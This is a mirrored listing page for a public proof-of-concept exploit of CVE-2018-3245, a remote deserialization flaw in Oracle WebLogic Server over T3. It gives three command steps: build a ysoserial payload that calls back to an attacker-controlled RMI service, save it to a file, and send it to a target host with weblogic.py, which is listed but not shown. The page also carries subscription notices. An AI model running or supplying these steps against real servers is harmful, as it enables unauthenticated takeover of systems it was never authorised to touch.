CVE-2018-3245 PoC — Oracle Fusion Middleware WebLogic Server组件安全漏洞

Source

https://github.com/ianxtianxt/CVE-2018-3245

Associated Vulnerability

Title:Oracle Fusion Middleware WebLogic Server组件安全漏洞 (CVE-2018-3245)
Description:Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Description

CVE-2018-3245

Readme

# CVE-2018-3245

## Step 1

`java -jar ysoserial-cve-2018-3245.jar`

```
WHY SO SERIAL?
Usage: java -jar ysoserial-cve-2018-3245.jar [payload] '[command]'
Available payload types:
     Payload         Authors   Dependencies
     -------         -------   ------------
     CVE_2018_2893_1 @mbechler
     CVE_2018_2893_2 @mbechler
     CVE_2018_2893_3 @mbechler
     CVE_2018_3245   @mbechler
     JRMPClient      @mbechler
     Jdk7u21         @frohoff
```

## Step 2

`java -jar ysoserial-cve-2018-3245.jar  CVE_2018_3245  "[RMI_SERVICE_IP]:[PORT]"  >  poc5.ser`

## Step 3

`python weblogic.py [TARGET_HOST] [PORT] poc5.ser`

File Snapshot


 [4.0K]  /data/pocs/85be8d8f2191b86fbbbbca4958558ba229740cb6
├── [ 629]  README.md
├── [5.3K]  weblogic.py
└── [7.0M]  ysoserial-cve-2018-3245.jar

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!